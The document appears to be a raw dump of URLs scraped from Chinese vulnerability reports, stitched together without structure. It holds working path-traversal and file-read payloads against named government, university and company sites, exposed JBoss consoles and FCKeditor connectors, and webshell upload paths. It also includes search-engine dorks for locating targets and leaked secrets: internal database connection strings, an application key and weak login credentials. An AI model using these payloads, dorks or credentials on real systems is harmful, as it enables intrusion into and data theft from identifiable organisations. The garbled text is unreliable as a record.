m.laiwang.com/go/market/channel_landing_page2.php?ci= inurl:ACTIONSHOWNEWS inurl:ACTIONSHOWNEWS.APPPROCESS http://jw.***.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 http://jwcweb.***u.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1361 http://***c.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1521 http://ea.***m.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=2381 http://edu.***c.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=4023 http://218.61.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=124 http://jwc.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081 http://211.82.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244 http://jiaowu.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410 http://www1.***y.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181 http://www.***y.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61 http://cityjw.***.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163 http://121.22.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270 http://218.7.***.***:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61 http://202.97.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241 http://202.119.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://jwk.d***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482 http://gz.s***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301 http://jwgl.***u.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461 http://59.73.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563 http://123.233.***.***:8080/index.jsp http://218.8.**.***:8888/ACTIONSHOWFILES.APPPROCESS?mode=1 http://202.198.***.***/ http://221.211.***.***/ACTIONSHOWFILES.APPPROCESS?mode=1 http://202.***.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://edu.***.com/Main.jsp http://sysjk.ivdc.gov.cn:8081/cx/ cn:8081/cx/querysyjdcjjg/querysyjdcjjg.do http://www.jxmtdzj.com/temp.php?pid=18&dir=190 
http://px1624ts.blog.163.com/blog/static/2080002552012594726428/ http://192.168.1.1/GateWay/RosApi.asmx http://192.168.1.1/GateWay/RosApi.asmx?op=CheckLoginUser http://192.168.1.1/GateWay/RosApi.asmx?op=SetUserOffLine http://www.bnu1.org/ http://dj.cnr.cn/administrator http://cn.astercc.org/2009/01/07/astercc-box-01-iso-%E5%8F%91%E5%B8%83.html http://cn.astercc.org/2009/01/wp-content/uploads/2009/01/freepbx_cn.png cn.astercc.org/webshell.php trac.astercc.com/asterCC/conf/trac.ini org:astercc.org:e5c8709df07039c4243a1b838cfefbbe org:astercc.org:fcdfb0298b99af0aec7be800cf288cce org:astercc.org:b99a13e9b8d25f6e93f8cf019d360c33 org:astercc.org:b19adf580bc884716d15a8c3db1d0350 6.trac.astercc.com/asterCC/db发现了一些东西 http://www.lxcourt.gov.cn/show_class.php?id=1150 http://test.spider.com.cn:8060/jmx-console/ http://www.whxzfw.gov.cn/index/showIndex.action www.whxzfw.gov.cn/index/downLoadFile.action?fileName=1-1%B9%AB%B9%B2%B3%A1%CB%F9%CE%C0%C9%FA%D0%ED%BF%C9%C9%EA%C7%EB%CA%E9%CA%BE%B7%B6%CE%C4%B1%BE.doc&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.168.8:1433/webroot_wh;charset=gbk;SelectMethod=CURSOR http://www.whxzfw.gov.cn:8000/oa http://www.whxzfw.gov.cn/xzfw http://www.whxzfw.gov.cn/xzfw/netLogin.action http://www.whxzfw.gov.cn:8000/xzjc http://localhost/xzfw/ApplicationDataService.jws http://www.hbxzzx.gov.cn/index/showIndex.action www.hbxzzx.gov.cn/index/downLoadFile.action?filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.0.252:1433/hb_web;charset=gbk;SelectMethod=CURSOR jdbc:oracle:thin:@192.168.0.47:1521:fstest http://192.168.0.31:8080/xzfw_yidu_ok/ApplicationDataService.jws 
http://www.xfxzfw.gov.cn:8080/index/showIndex.action http://www.xfxzfw.gov.cn:8080/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR http://119.36.79.214:8080/xzfw/ApplicationDataService.jws http://219.139.28.8:8880/ybgy http://119.36.79.214:8080/xzfw/staticBLWorkFlow.action?caseid=&workflowid= http://110.7.48.79:8081/index/showIndex.action http://110.7.48.79:8081/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.1.2:1433/xzfwweb;charset=gbk;SelectMethod=CURSOR http://localhost/xzfw/ApplicationDataService.jws http://61.157.144.79/Public/SzxyPortal/loginForm.jsp http://61.157.144.79/wfJSP/virtualDisk/issuance/fileTextEdit.jsf?folderType=release&folderPath=../../../../&fileName=etc/passwd http://www.hdqqx.cn/ly/admin/qwbm_index.asp http://1000bank.com/other/about.action http://1000bank.com/other/news.action http://wooyun.org/bugs/wooyun-2014-048789 http://111.13.55.55/webmanage/index1.jsp http://www.360class.cn http://www.360class.cn/cus/cusweb!isLogin.action http://jjgl.bjmu.edu.cn/ci/web.temp.index.do http://jjgl.bjmu.edu.cn/ci/website.show.do?m=s&show.form.iid=15 http://jjgl.bjmu.edu.cn/app/webstudent_prjact.form.do?paid=1231 http://www.chinaamc.com/zcms/Services/Activity/universal/S_page_ztc_lb.jsp?catalogid=105766 http://news.sau.edu.cn/ inurl:eeoa/login.jsp http://120.193.248.122/eeoa/registerRegisterAction.action http://www.nj29jt.net:98/eeoa/registerRegisterAction.action 
http://threeoa.dhu.cc/eeoaftp/downloadFile.action?path=/index.jsp http://threeoa.dhu.cc/eeoaftp/downloadFile.action?path=/WEB-INF/web.xml http://threeoa1.dhu.cc/bl/space?uuid=cefa9799e7cd1ee8dc40bb1bded9a872 http://www.hshsh.pudong-edu.sh.cn/bl/personalMng/image_detail.jsp?imageId=img67000000395 http://www.hshsh.pudong-edu.sh.cn/be/ber_manager_detail.jsp?regionFile=sh&myBer=1&uuid=c0ecc4fd202bd16798bb27dfe9ecffff http://tw.hzau.edu.cn/ http://www.lzws.gov.cn/admin/adminlogin.asp http://www.sqbank.com.cn http://saa.csu.edu.cn/index.html http://yollyah.com/ ftp://yollyah.com/ http://lntgw.lnu.edu.cn/info.php?num=137 http://lntgw.lnu.edu.cn/info.php?num=137 http://lntgw.lnu.edu.cn/info.php?num=137 http://ouya.henu.edu.cn/ https://passport.alipay.com/login/login.htm?return_url=http%3A%2F%2Fmail.aliyun.com%2Falimail%2Fauth%2FcallbackForHavana%3Freurl%3D%252Falimail%252F&fromSite=9,查找DOM可查找到https://img.alipay.com/common/um/lsa.swf?v=1,分析SWF文件可知存在与 http://mail.aliyun.com/ https://jsfile2012.appspot.com/paypalpoc?data= http://61.168.222.157/login.jsp http://202.100.78.35/login.jsp http://202.99.122.144/login.jsp http://116.10.125.143/login.jsp http://118.213.88.17/login.jsp http://221.192.154.15/login.jsp http://117.34.64.100/login.jsp http://218.25.248.50/login.jsp http://222.161.12.130/login.jsp http://115.153.192.2/login.jsp http://xyj.im/xyj.m.html http://yunpan.alibaba-inc.com/ http://bbs.fumu.com/home.php?mod=spacecp http://www.sdxnw.gov.cn/document_show.asp?id=75087&mark=101 http://www.shaoxing.gov.cn/wyztc/proposal/download.action?directory=proposals&fileName=../index.jsp www.ddztb.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.ddcei.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.ddfgw.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.hrbwrb.gov.cn/down.action?attachentName=../dynamicPages/search.jsp 
https://www.google.com.hk/search?q=ZDSOFT.NET信息发布平台-+++登录&oq=ZDSOFT.NET信息发布平台-+++登录&aqs=chrome..69i57&sourceid=chrome&espv=210&es_sm=91&ie=UTF-8 http://www.l****.cn:8080/jmx-console/ http://www.g***u.gov.cn:8080/jmx-console/ http://www.j***i.net:8080/jmx-console/ http://222.**.***.42:81/jmx-console/ http://www.r**x.com:8080/jmx-console/ http://j***i.net:8080/jmx-console/ http://218.**.***.5*:8080/jmx-console/ http://wwww.****u.gov.cn:8080/jmx-console/ http://www.smegz.gov.cn/ctiin/share/DownloadFileAction.do?file=index.jsp&name=22.txt http://en.damai.cn/All_Tickets.aspx?key=xmlq58BX http://en.damai.cn/All_Tickets.aspx?key=xmlq58BX http://tuandui.sdta.cn/tourforecast/loginmain.jsp http://wz.investment.gov.cn/SFI/bsAffairdocsAction.do?method=excute&path=WEB-INF/web.xml http://bj.5i5j.com/.svn/entries http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/dedecms/login.php http://www.maxen.com.cn/plus/show.php www.investbeijing.gov.cn/file.do?fname=../index.jsp www.jxsl.gov.cn/download.jsp?action=download&filename=../../download.jsp http://www.google.com.tw/#newwindow=1&q=inurl:gov.cn+showIssueContentAction.do&start=10 http://www.xinxing.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://www.yunfu.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://sp.yulin.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp 
http://www.yfga.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://www.yfxjxq.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp www.jieyang.gov.cn/Worker.ashx?action=getatt&fp=../../view.aspx jd.nbfz.gov.cn/adminlaw/site_backup.jsp?action=download&filename=c:/boot.ini http://www.yyzwfw.gov.cn/index/downLoadFile.action?filePath=index.jsp&fileName=11.txt Url:http://www.wandaperformance.com/user.do?parameter=password www.cast.gov.cn/admin/index.php?controller=BoProducts&action=DownFile&file_source_name=11.txt&file_record_name=../../public/english/index.php http://ir.anta.com http://ir.anta.com/mobile/html/report.php?year=2013依然存在注入 http://www.hdws.gov.cn/download.php?id=../download.php http://www.google.com.tw/search?q=inurl:do_download.jsp&newwindow=1&noj=1&ei=kv0qU-bCK6WpiAeBy4CADA&start=40&sa=N&biw=1920&bih=760 www.gxhzgjj.com/do_download.jsp?id=../index.jsp gtj.heyuan.gov.cn/do_download.jsp?path=\index.jsp www.gdyc.gov.cn/jsp/do_download.jsp?path=\jsp\news.jsp www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=/index.jsp www.fwzx-dhp.gov.cn/setting/download/do_download.jsp?url=/index.jsp http://www.hbcy.gov.cn/application/bgxz/download.jsp?filename=F:/web_changyang/public_html//application/index.jsp http://wow.tgbus.com/ http://kurei.cn/index.html http://www.google.de/#newwindow=1&q=inurl:Announce%2Fthread-79.html http://rzzx.kingdee.com http://rzzx.kingdee.com http://www.japrtc.gov.cn/new_info_dowload.jsp?wj=/index.jsp http://www.japrtc.gov.cn/new_info_dowload.jsp?wj=/new_info_dowload.jsp http://www.jshrss.gov.cn/Auditing/download.jsp?filename=../download.jsp http://kefuzhaopinwang.com/admin/admin_login.php?act=login http://www.futizaixian.com/Trade/Dlt/Project_Info.html?id=114111 http://nauce.nau.edu.cn/portal/ 
http://nauce.nau.edu.cn/learning/simple_forum/list.jsp?forum_id=online_faq&forum_name=%E7%B3%BB%E7%BB%9F%E4%BD%BF%E7%94%A8%E4%BA%A4%E6%B5%81&is_show=9 http://nauce.nau.edu.cn/learning/client_scripts/ http://www.goodjob100.com/ http://denglish.e21.cn/diag/user_myclazz.do?pageNum=1&pageRows=5&grade=0 http://gdwap.dooland.com/ http://gdwap.dooland.com/b.php?id=8592 http://gdwap.dooland.com/pic.php?pid=98992&page=3&articleid=383661 http://gdwap.dooland.com/s.php?id=4 http://bbs.xingcloud.com/ http://jsxy.nau.edu.cn/web/enrolling/CompReg.aspx http://jsxy.nau.edu.cn/user/eSchool/Student/JobDetail.aspx?JobID=16 http://jsxy.nau.edu.cn/user/auths/index.aspx http://clubclient.qq.com/clubclient_goto.php?uin=63636&key=2724F259C5FB538000EF24D374D60165452526EA51985EE962D5379B4BF4BD30&sendclick=1&qptag=1&statid=10001903&gotourl=http://qzone.qq.com&tipsid=52684&ADUIN=2533750203&ADSESSION=1356685136&ADTAG=CLIENT.QQ.4855_.0&ADPUBNO=26095 http://trip.taobao.com/go/act/other/dxhb2014.php http://www.ommoo.com/admin/index.php?m=Public&a=login````注入在http://www.ommoo.com/u.php?action=prettify&uid=177071这里and inurl:u***es inurl:index.jsp inurl:do***?siteid http://www.wuzhi.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://eqrsj.***.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.j***o.jcy.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.s***u.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://cjl.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.***.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector 
http://www.e***k.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://***j.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.***g.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://jsj.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.emaotai.cn/shop.zip http://hyfw.12306.cn http://68cn.dooland.com/subscription.php?id=2687 http://68cn.dooland.com/forgetpass.php http://68cn.dooland.com/order_submit.php http://dev.g.qq.com/checkLoginCallback.json?id=0&callback=xxxx http://iche.zju.edu.cn http://iche.zju.edu.cn/Default.aspx http://iche.zju.edu.cn/Default.aspx?orgid=1 http://iche.zju.edu.cn/ckfinder/lang/com7.dama.asp http://www.cnpre.com/web/chinasoe/data/ http://www.cnpre.com/admin/link.htm http://www.cnpre.com/admin/link.doc https://www.payele.com/b2b/payment_data_m.php https://www.payele.com/b2b/payment.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php?username=admin1 http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://news.gdredcross.org.cn/web/newsshow_list0.asp?tflag=0 http://tousu.auto.sohu.com/tousu16056.shtml http://wydrops-wordpress.stor.sinaapp.com/uploads/2014/05/qq.wmv http://kyc.ynnu.edu.cn/business/notifyView.jsp?notifyId=1 http://218.7.123.164/business/notifyView.jsp?notifyId=2 http://yk.cueb.edu.cn/business/notifyView.jsp?notifyId=1 http://202.114.177.182/business/notifyView.jsp?notifyId=1 http://210.40.3.16/business/notifyView.jsp?notifyId=1 http://119.97.184.242:8080/business/notifyView.jsp?notifyId=1 http://kyglsk.shnu.edu.cn/business/notifyView.jsp?notifyId=1 http://rms.njit.edu.cn/business/notifyView.jsp?notifyId=1 
http://kygl.gdqy.edu.cn/business/notifyView.jsp?notifyId=1 http://211.67.143.15/business/notifyView.jsp?notifyId=1 http://202.113.244.51/business/notifyView.jsp?notifyId=1 http://202.115.67.43/business/notifyView.jsp?notifyId=1 http://210.26.80.98/business/notifyView.jsp?notifyId=1 http://210.45.168.61/business/notifyView.jsp?notifyId=1 http://219.229.222.51/business/notifyView.jsp?notifyId=1 http://keyan.shufe.edu.cn/business/notifyView.jsp?notifyId=1 http://kjc.swun.edu.cn/business/notifyView.jsp?notifyId=1 http://210.26.64.161/business/notifyView.jsp?notifyId=1 http://kyc.xzmy.edu.cn/business/notifyView.jsp?notifyId=1 http://219.246.16.38/business/notifyView.jsp?notifyId=1 http://fsxy.mnu.cn/business/notifyView.jsp?notifyId=1 http://202.195.69.154/business/notifyView.jsp?notifyId=1 http://202.203.194.6/business/notifyView.jsp?notifyId=1 http://61.139.105.156/business/notifyView.jsp?notifyId=1 http://124.205.136.216/business/notifyView.jsp?notifyId=1 http://222.197.183.68/business/notifyView.jsp?notifyId=1 http://59.72.0.2/business/notifyView.jsp?notifyId=1 http://nyj.jl.gov.cn/AgencyView.php?Id=1 http://oa.yuhong.com.cn/login/Login.jsp?logintype=1 http://oa.yuhong.com.cn/log/ecology http://club.womai.com/ http://202.117.112.29/login/List.aspx?ID=10 http://xg.chd.edu.cn/Login/List.aspx?ID=99 http://xg.snnu.edu.cn/Login/List.aspx?ID=99 http://202.200.16.19/login/List.aspx?ID=99 http://202.200.168.108/Login/List.aspx?ID=99 http://xg.snnu.edu.cn/Login/List.aspx?ID=99为例 http://202.96.31.16:8080/vrd/front/dossier/searchOneContent.action?dossierID=297e3da63fa786e101402815e8f10808&page=1&dossierTitle=&dossierQuestionOriginalityContent=&dossierQuestionLanguage=&dossierAnswerOriginalityContent=&dossierAnswerLanguage=&dossierDealState=0&classID= http://aao.neu.edu.cn/dbdx/css/QQ775276942.asp http://summerintern.chinaamc.com/login.jsp http://www.zbqczz.com http://www.muyingzhijia.com/ http://www.muyingzhijia.com/forgetpassword.aspx)填写好要重置的用户名和验证码(随便填写),点击获取手机验证码并抓包 
http://189edu.cn/jmx-console/ https://secure.ctrip.com/wapSecurity/ https://secure.ctrip.com/wapSecurity/log/ https://secure.ctrip.com/w******ity/_bin_deployableAssemblies/System.Web.Mvc.dll https://secure.ctrip.com/w*******ity/obj/Release/Ctrip.Wap.SecuritySite.dll URL:http://www.qixian.gov.cn/xx.asp http://waptest.ctrip.com/market/m.ctrip.com.market.zip http://waptest.ctrip.com/passupdate/passupdate.rar http://www.scdfz.org.cn/newslist.jspdictCode=0203&dictType=00&dictName=%B9%A4%D7%F7%BB%FA%B9%B9 http://imrs.csu.edu.cn/)存在SQL注射 http://www.fzsgsl.gov.cn/ http://www.ziyangxian.gov.cn/ http://spaq.yishui.gov.cn/m/search/list.php?t=3&siteId=1 http://passport.cnw.com.cn/ http://wooyun.org/bugs/wooyun-2010-049798 http://au.xridc.com/au/ https://10.0.1.157:10000/ http://www.steeltower.com.cn/CompVisualizeBig.asp?id=15 http://www.jinyuan.gov.cn/jyq/jyq/index.action http://www.xjxdf.com/ http://www.qxaic.gov.cn/ http://www.qxaic.gov.cn/admin http://passport.cnw.com.cn/findusername.php?username=crtest1 http://www.jstxrcb.net/)存在SQL注射可直接注出管理员 http://old.scta.gov.cn/web/main.jsp?go=newsList&pid=13&cid=1725&keyword= site:edu.cn/shownews.aspx?newsno= http://sy.cxxy.seu.edu.cn/shownews.aspx?newsno=133 http://202.119.189.239:8014/shownews.aspx?newsno=14 http://210.29.152.168/shownews.aspx?newsno=187 http://sjjx.siit.edu.cn:81/shownews.aspx?newsno=1 http://www.tyresort.com/ http://www.tyresort.com/hr/upload/resume.html http://www.tyresort.com/hr/write/resume.html http://hqzx.ruiboshi.com/Edu_entrySave.action http://221.230.60.101:81/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://slff.bgu.edu.cn/count/ http://slff.bgu.edu.cn/editor/ http://slff.bgu.edu.cn/database/ http://slff.bgu.edu.cn/include/ http://slff.bgu.edu.cn/script/ http://slff.bgu.edu.cn/upload/ http://slff.bgu.edu.cn/images/ http://slff.bgu.edu.cn/database/ http://slff.bgu.edu.cn/School.asp?ID=34 http://slff.bgu.edu.cn/School.asp?ID=34 
http://www.cqtelecom.com.cn/ http://www.cqtelecom.com.cn/admin/login.aspx http://www.cnooc-zspc.com/login/Jeecms.do http://www.22shop.com/member/ForgetPwd.aspx?mid=te***rr&email=i***i@yeah.net&code=A4C00***157***42 http://www.22shop.com/member/ForgetPwd.aspx?mid http://220.196.52.75:8080/ http://220.196.52.146/Default.aspx http://220.196.52.210/login/login!index.action http://124.160.192.170/cardzj/ui/login/login.action www.xxxx.com/admin/login.htm登陆到后台 www.vl86.com http://www.nbmc.com.cn/ http://sehd.360.cn/turntable/base/draw/?active=0434a1&qid=MD5值 http://www.phb168.com/ http://www.phb168.com/phbcms/ArtiSearch.do?searchKey=%CD%F5%B6%AC%CA%A4&count=15&chnlId=&typeId=3 http://english.352.com/harborII/presentWebAction!queryPresentRegion.dox http://221.199.9.170:8080/userLogin.action http://dou.tgbus.com/forum.php http://www.zchospital.com/xtwh/upfile.aspx http://221.136.78.209:7001/wscx/ http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin http://pan.baidu.com/share/link?shareid=742573219&uk=453023976&fid=512660478 http://bidding.jl.sgcc.com.cn/.svn/entries http://m.gd10010.cn/ http://www.cassrccp.com/) http://gd.cucn.edu.cn) Url:http://bianlun.7k7k.com/admin/test.php http://lol.uuu9.com/lolgl/adminlolgl/AdminList.aspx shencheng:123456 http://www.qsng.cn/helper/reg.do http://ph.qsng.cn/helper/reg.do http://xh.qsng.cn/helper/reg.do http://cx.qsng.cn/helper/reg.do http://lq.qsng.cn/helper/reg.do http://pt.qsng.cn/helper/reg.do site:bbs.amap.com http://www.js96777.com/stk/lwcz/Admin.jsp http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd http://www.pconline.com.cn/adtest.php?url=adtest.php http://www.jmyan.com/jmyan.rar http://www.zzeq.gov.cn:8080/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://m.jx.189.cn/ site:jx.189.cn http://219.143.235.205/database/SiteWeaver http://www.weiyun.com/disk/index.html 
http://www.yozosoft.com/office/fileconvert.jsp的office预览功能,本次重点测试该预览的过滤效果。 http://bbs.lenovo.com/forum.php http://www.lian7.com/ http://www.lian7.com/shop/这个是商店地址,瑞然前台修改了默认页,但从其他目录很容易可以看的出是正在建设的ecshop,而且此版的ecshop的所有漏洞几乎全没修复,直接用exp注入,爆出账号和密码, http://game.funshion.com/home/ http://www.welp.cn/question/26198 www.tgbus.com site:tgbus.com inurl:profile http://www.cie.gov.cn/ http://www.cnfamily.com/ http://www.tspec.cn/ http://www.cpac.com.cn/ http://www.cpac.com.cn/RegistStep2.asp http://www.cpac.com.cn/RegistStep3.asp http://www.cpac.com.cn/RegistStep4.asp http://www.cpac.com.cn/zygg_fb/zuoping/lie.asp http://jiading.tongji.edu.cn/ http://www.baidu.com/ulink?url=http%3A%2F%2Fmusic.baidu.com%2F%2Fdata2%2Flrc%2F34272020%2F34272020.lrc%3Ffm%3Daltg5&wd=lose%20yourself%E6%AD%8C%E8%AF%8D&&tn=baidu&&ie=utf-8&&&&oq=lose%20yourse&&f=3&rsp=1&inputT=11 http://www.jiuyini.com/ http://f.game.tom.com/wod.php inurl:Default3.action inurl:Default2.action uc_key:icu3c8O7AdLa97P126h6O7C1K4Qaocd3q91eTcUcs571B91f84C2o137J9ubj6J7 http://bbs.game.tom.com/ uc_key:icu3c8O7AdLa97P126h6O7C1K4Qaocd3q91eTcUcs571B91f84C2o137J9ubj6J7 http://bbs.game.tom.com/ http://www.qyzl.gov.cn/ dir:C:\Apache http://www.hnrlzysc.com/ http://fxy.xjtu.edu.cn/Show.asp?id=196 www.scrc168.com http://youxi.19lou.com/index.php/article/index/870%22and%20 http://www.158wan.com/index.php/article/index/1060 http://www.cqtelecom.com.cn/Job/ http://www.cqtelecom.com.cn/job/file.asp?uid=276&FileType=Photo http://www.cqtelecom.com.cn/job/file.asp?uid=276&FileType=OtherFile http://login.sina.com.cn/forgot/index?type=sms&entry=sso font-size:16px\ font-size:16px\ http://www.zzradio.cn/)电台协同办公系统(http://218.28.9.114/oa/)存在弱口令,可以导致内部文件,员工信息泄露,登陆后台可上传webshell提权,危害较大! 
http://hr.ciomp.ac.cn/zhaopin/login/login.jsp http://hr.ciomp.ac.cn/zhaopin/login/login.jsp登录窗口的用户名处填写单引号,提示“user数据库查询错误:[Microsoft][SQLServer http://hr.ciomp.ac.cn/zhaopin/bulletin.jsp?id=79 http://159.226.100.147/upload_files/index.asp http://adm.jlu.edu.cn/new/frame.php?body=c://boot.ini&id=25&mid=202&nid=202&ref=/new/frame.php%3Fbody%3Dinc/tchs.spec.htm%26mid%3D202%26nid%3D202 http://202.198.17.23:8060/cy/common/loginput.erun http://chem.jlu.edu.cn/chemistry/search_result.php?id=1515 http://c.3g.163.com/nc/uc/store/myprizes/?userid=m18******7@163.com http://c.3g.163.com/nc/uc/prize/instance/ http://c.3g.163.com/nc/uc/prize/instance/ http://active.163.com/service/form/v1/1396/list.jsonp?_charset=UTF-8&page=1&pageSize=10&callback=ugc http://www.siteserver.cn/case/ inurl:siteserver site:gov.cn http://www.fcwl.gov.cn/ http://jichang.shciq.gov.cn/ http://www.ordos.lm.gov.cn/ http://www.gd218.org.cn/ http://www.cssttc.gov.cn/ http://www.xbwlg.gov.cn/ http://www.ordos.lm.gov.cn/siteserver/cms/console_tableMetadata.aspx?TableType=JobContent&ENName=au_JobContent%27 http://218.85.65.35/ http://218.85.65.35:9081/jmx-console/abc.jsp JBOSS:http://218.85.65.35:9081/web-console/ http://mail.homeinns.com/login2.html http://baiduapp.brilliantpr.com.cn/uploads/fx.txt http://baiduapp.brilliantpr.com.cn/images/jiangxiang.gif http://baiduapp.brilliantpr.com.cn/images/jiangxiang.gif/a.php http://218.31.33.3:8090/jxtarget!listDepkind2.action http://58.242.2.14:8080/isapadmin/login.do www.reochina.cn www.cnreo.com http://www.cnreo.com/ns!detail.action?id=172 http://ka.tgbus.com上,上面每个淘号买号什么的下面的评论都有问题,是直接套用http://api.tgbus.com/comment2/default.html的,比如 http://ka.tgbus.com/2194/ http://cxcy.jlu.edu.cn:8080/plugins/member/main1.jsp?nodeID=25018&temps=0.55971072264947 http://cxcy.jlu.edu.cn:8080/state/jluCX/jluCXShowResult.jsp?dicID=2500002&temps=1395719666384 DATA:nodeID=25021&stateID=25&logStart=2014-03-18&logEnd=2014-03-25&op=%3D&fromIP=1&Submit=%B2%E9+%D1%AF 
http://megrez.alibaba-inc.com/***/login.htm http://ux.etao.com/search?q= http://work.alibaba-inc.com/photo/aliwork_app_download.html http://epaper.jlu.edu.cn:81/contribute.php http://epaper.jlu.edu.cn:81/file/_temp/ http://epaper.jlu.edu.cn:81/file/_temp/0386eb4dc03d94c9ed2272d12f47a425154106.php http://epaper.jlu.edu.cn:81/file/_temp/0f09c5f224744c682802a6121cfbe94768673.php http://epaper.jlu.edu.cn:81/file/_temp/199312a312b08245daba688bc8596c96332064.php http://kdjw.hnust.cn/kdjw/kjlbgl.do?method=goStudentSKBmZf&sksjid=39D442A2987841C79234FCE28619A1DB&xs0101id=【此处为学生学号】 http://img.muyingzhijia.com/ http://img.muyingzhijia.com/product/userupload/20140325010115771Chrysanthemum.txt http://img.muyingzhijia.com/Chrysanthemum.jpg http://zs.51ey.com/ http://www.jxnews.com.cn/)的大江网邮箱(http://mail.jxnews.com.cn/)邮箱系统存在Sql注入漏洞。中国江西网 http://www.jxnews.com.cn/ http://mail.jxnews.com.cn/ http://219.242.65.10/ http://www.jnqei.net:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://www.hbqx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html http://www.hbqx.gov.cn/UploadFile/2.php;.gif http://webmail.hnu.edu.cn/ http://www.cledu.com.cn/cledu/edit/uploadfile/20143/Fl201403241901162781.asp;jpg http://123.157.141.163:8080 http://123.157.141.247 http://dealer.it168.com/ 